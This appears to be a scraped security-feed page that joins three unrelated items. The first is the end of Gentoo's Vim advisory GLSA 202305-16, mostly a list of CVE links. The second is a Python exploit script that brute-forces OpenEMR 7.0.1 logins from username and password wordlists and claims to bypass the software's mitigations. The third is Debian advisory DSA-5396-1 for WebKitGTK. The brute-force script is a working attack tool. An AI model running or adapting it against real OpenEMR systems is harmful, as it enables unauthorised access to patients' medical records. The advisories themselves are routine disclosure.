[ 50 ] CVE-2022-2344  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2344  
[ 51 ] CVE-2022-2345  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2345  
[ 52 ] CVE-2022-2522  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2522  
[ 53 ] CVE-2022-2816  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2816  
[ 54 ] CVE-2022-2817  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2817  
[ 55 ] CVE-2022-2819  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2819  
[ 56 ] CVE-2022-2845  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2845  
[ 57 ] CVE-2022-2849  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2849  
[ 58 ] CVE-2022-2862  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2862  
[ 59 ] CVE-2022-2874  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2874  
[ 60 ] CVE-2022-2889  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2889  
[ 61 ] CVE-2022-2923  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2923  
[ 62 ] CVE-2022-2946  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2946  
[ 63 ] CVE-2022-2980  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2980  
[ 64 ] CVE-2022-2982  
      https://nvd.nist.gov/vuln/detail/CVE-2022-2982  
[ 65 ] CVE-2022-3016  
      https://nvd.nist.gov/vuln/detail/CVE-2022-3016  
[ 66 ] CVE-2022-3099  
      https://nvd.nist.gov/vuln/detail/CVE-2022-3099  
[ 67 ] CVE-2022-3134  
      https://nvd.nist.gov/vuln/detail/CVE-2022-3134  
[ 68 ] CVE-2022-3153  
      https://nvd.nist.gov/vuln/detail/CVE-2022-3153  
[ 69 ] CVE-2022-3234  
      https://nvd.nist.gov/vuln/detail/CVE-2022-3234  
[ 70 ] CVE-2022-3235  
      https://nvd.nist.gov/vuln/detail/CVE-2022-3235  
[ 71 ] CVE-2022-3256  
      https://nvd.nist.gov/vuln/detail/CVE-2022-3256  
[ 72 ] CVE-2022-3278  
      https://nvd.nist.gov/vuln/detail/CVE-2022-3278  
[ 73 ] CVE-2022-3296  
      https://nvd.nist.gov/vuln/detail/CVE-2022-3296  
[ 74 ] CVE-2022-3297  
      https://nvd.nist.gov/vuln/detail/CVE-2022-3297  
[ 75 ] CVE-2022-3324  
      https://nvd.nist.gov/vuln/detail/CVE-2022-3324  
[ 76 ] CVE-2022-3352  
      https://nvd.nist.gov/vuln/detail/CVE-2022-3352  
[ 77 ] CVE-2022-3491  
      https://nvd.nist.gov/vuln/detail/CVE-2022-3491  
[ 78 ] CVE-2022-3520  
      https://nvd.nist.gov/vuln/detail/CVE-2022-3520  
[ 79 ] CVE-2022-3591  
      https://nvd.nist.gov/vuln/detail/CVE-2022-3591  
[ 80 ] CVE-2022-3705  
      https://nvd.nist.gov/vuln/detail/CVE-2022-3705  
[ 81 ] CVE-2022-4141  
      https://nvd.nist.gov/vuln/detail/CVE-2022-4141  
[ 82 ] CVE-2022-4292  
      https://nvd.nist.gov/vuln/detail/CVE-2022-4292  
[ 83 ] CVE-2022-4293  
      https://nvd.nist.gov/vuln/detail/CVE-2022-4293  
[ 84 ] CVE-2022-47024  
      https://nvd.nist.gov/vuln/detail/CVE-2022-47024  
[ 85 ] CVE-2023-0049  
      https://nvd.nist.gov/vuln/detail/CVE-2023-0049  
[ 86 ] CVE-2023-0051  
      https://nvd.nist.gov/vuln/detail/CVE-2023-0051  
[ 87 ] CVE-2023-0054  
      https://nvd.nist.gov/vuln/detail/CVE-2023-0054

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202305-16

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202305-16

OpenEMR versions 7.0.1 and below remote authentication bruteforcing tool that bypasses mitigations.

    # Exploit Title: OpenEMR v7.0.1 - Authentication credentials brute force# Date: 2023-04-28# Exploit Author: abhhi (Abhishek Birdawade)# Vendor Homepage: https://www.open-emr.org/# Software Link: https://github.com/openemr/openemr/archive/refs/tags/v7_0_1.tar.gz# Version: 7.0.1# Tested on: Windows'''Example Usage:- python3 exploitBF.py -l "http://127.0.0.1/interface/main/main_screen.php?auth=login&site=default" -u username -p pass.txt '''import requestsimport sysimport argparse, textwrapfrom pwn import *#Expected Argumentsparser = argparse.ArgumentParser(description="OpenEMR <= 7.0.1 Authentication Bruteforce Mitigation Bypass", formatter_class=argparse.RawTextHelpFormatter, epilog=textwrap.dedent(''' Exploit Usage : python3 exploitBF.py -l http://127.0.0.1/interface/main/main_screen.php?auth=login&site=default -u username -p pass.txtpython3 exploitBF.py -l http://127.0.0.1/interface/main/main_screen.php?auth=login&site=default -ul user.txt -p pass.txtpython3 exploitBF.py -l http://127.0.0.1/interface/main/main_screen.php?auth=login&site=default -ul /Directory/user.txt -p /Directory/pass.txt'''))                     parser.add_argument("-l","--url", help="Path to OpenEMR (Example: http://127.0.0.1/interface/main/main_screen.php?auth=login&site=default)") parser.add_argument("-u","--username", help="Username to Bruteforce for.")parser.add_argument("-ul","--userlist", help="Username Dictionary")  parser.add_argument("-p","--passlist", help="Password Dictionary")    args = parser.parse_args()if len(sys.argv) < 2:    print (f"Exploit Usage: python3 exploitBF.py -h")              sys.exit(1)  # VariableLoginPage = args.urlUsername = args.usernameUsername_list = args.userlistPassword_list = args.passlistlog.info('OpenEMR Authentication Brute Force Mitigation Bypass Script by abhhi \n ')def login(Username,Password):    session = requests.session()              r = session.get(LoginPage) # Progress Check        process = log.progress('Brute Force')#Specifying Headers Value    headerscontent = {    'User-Agent' : 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0',    'Referer' : f"{LoginPage}",    'Origin' : f"{LoginPage}",    }#POST REQ data    postreqcontent = {    'new_login_session_management' : 1,    'languageChoice' : 1,    'authUser' : f"{Username}",    'clearPass' : f"{Password}"    }#Sending POST REQ    r = session.post(LoginPage, data = postreqcontent, headers = headerscontent, allow_redirects= False)#Printing Username:Password                process.status('Testing -> {U}:{P}'.format(U = Username, P = Password))            #Conditional loops        if 'Location' in r.headers:        if "/interface/main/tabs/main.php" in r.headers['Location']:            print()            log.info(f'SUCCESS !!')            log.success(f"Use Credential -> {Username}:{Password}")            sys.exit(0)        #Reading User.txt & Pass.txt filesif Username_list:    userfile = open(Username_list).readlines()    for Username in userfile:        Username = Username.strip() passfile = open(Password_list).readlines()for Password in passfile:    Password = Password.strip()       login(Username,Password)

OpenEMR 7.0.1 Authentication Bruteforce Mitigation Bypass

Debian Linux Security Advisory 5396-1 - Vulnerabilities have been discovered in the WebKitGTK web engine. Luan Herrera discovered that an HTML document may be able to render iframes with sensitive user information. P1umer and Q1IQ discovered that processing maliciously crafted web content may lead to arbitrary code execution. An anonymous researcher discovered that processing maliciously crafted web content may bypass Same Origin Policy. Clement Lecigne and Donncha O Cearbhaill discovered that processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5396-1                   security@debian.org  
https://www.debian.org/security/                           Alberto Garcia  
May 03, 2023                          https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : webkit2gtk  
CVE ID         : CVE-2022-0108 CVE-2022-32885 CVE-2023-27932 CVE-2023-27954  
                 CVE-2023-28205

The following vulnerabilities have been discovered in the WebKitGTK  
web engine:

CVE-2022-0108

    Luan Herrera discovered that an HTML document may be able to  
    render iframes with sensitive user information.

CVE-2022-32885

    P1umer and Q1IQ discovered that processing maliciously crafted web  
    content may lead to arbitrary code execution.

CVE-2023-27932

    An anonymous researcher discovered that processing maliciously  
    crafted web content may bypass Same Origin Policy.

CVE-2023-27954

    An anonymous researcher discovered that a website may be able to  
    track sensitive user information.

CVE-2023-28205

    Clement Lecigne and Donncha O Cearbhaill discovered that  
    processing maliciously crafted web content may lead to arbitrary  
    code execution. Apple is aware of a report that this issue may  
    have been actively exploited.

For the stable distribution (bullseye), these problems have been fixed in  
version 2.40.1-1~deb11u1.

We recommend that you upgrade your webkit2gtk packages.

For the detailed security status of webkit2gtk please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/webkit2gtk

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEYrwugQBKzlHMYFizAAyEYu0C2AIFAmRSI5kACgkQAAyEYu0C  
2AJ8pxAAhwQbCnrdpJ7dl7gU1Yz/nkz1e3Nb9T5u5J32v85uqXj5KPRrtGFTi+uG  
dObt0lPep1Sn07G4wR2WU9SSc8/OPWpEmil0ULHof+YUDA0JVAi0fPT+EL8MFZpa  
H7xKUYYdyVh12wN56yEB7zz698SdrrB32XKfrcQZk5SlbNYaFAGzKhfkhWn/sDmo  
c9XgjH8WULLDpjeU9qRNFmMfw16WWzxuX6JPhyLFxKoT513y1ojEU/zBEqPb/J44  
gD60Kv8qBdgvYzP2VIWm7zX0O3fp5mrkxaBPhpwfaFdG3dBUHm6MzFY/PX5uMXjE  
ZkSUmlTW/pf4pfVkT0w+coDc4kT03QDLIZiY2Z1tn6HHNxNJRcpDq074l+NGIWfb  
SNoJJjbB+t0FAyCvlRuKrd09bsYDexuf/T61dTiWGp5t1AHs3ylBZ7raSCh58iN1  
u0H77NOLXjmNzbNYCCvPHKJukn38GmOTve4ZpFiZqym5X3bZ0/Xv33isnBxqLHoc  
8XJHL57qxIW7ls+yY5rqAUWeRzePZTd1lq3CEWKA/8wUxlEdFKZO2eHtdCykasR3  
8vNyMH77LjGaNdc9pORJv/UVLUcZ8qEeuNKyFYeuhuok6lY5EQBGwAeVVyJNj0Py  
0GufP85ZEdeBL9eKRSBeVJDClm111vJDhtAc57SyTgVSS/5jUoY=  
=xARY  
-----END PGP SIGNATURE-----

Tag

#linux